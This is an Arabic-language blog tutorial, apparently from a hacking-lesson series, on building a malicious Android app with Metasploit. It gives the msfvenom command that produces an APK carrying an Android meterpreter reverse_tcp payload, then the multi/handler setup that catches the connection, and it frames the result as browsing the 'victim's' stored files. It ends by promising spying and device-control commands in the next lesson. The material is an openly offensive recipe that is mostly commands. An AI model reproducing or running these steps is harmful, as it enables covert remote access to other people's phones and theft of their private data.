وامر الاختراق بالبايلود في أداة metasploit-framework بطريقتين:
مارس 27, 2018
الشرح:
الطريقة الاولى موجودة في الدرس السادس في المدونة ابحث عنها:
الطريقة الثانية لعمل البايلود مع اوامر الاختراق أداة metasploit-framework :
اولا

اظهار ال ip في صفحه اخري

ifconfig

-----------------------------------------------------------------


ثانيا بعد تثبيت الاداه

cd metasploit-framework

ls

-----------------------------------------------------------------


ثالثا

عمل بايلود. بطريقة اخرى: 

ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=هنا الايبي LPORT=هنا البورت R > /sdcard/termux.apk


-----------------------------------------------------------------


رابعا

بعد عمل البايلود اطلب

$ ./msfconsole 

$ use exploit/multi/handler 

$ set payload android/meterpreter/reverse_tcp

$ set lhost

$set lport

$ run


$help

$cd /sdcard

$ls


    ستظهر كافة ملفات الضحية في ذاكرة التخزين الداخلية وفي الدرس القادم سأترك لكم اوامر التجسس والتحكم ب جهاز الضحية وشكرا لكم للمتابعة. 


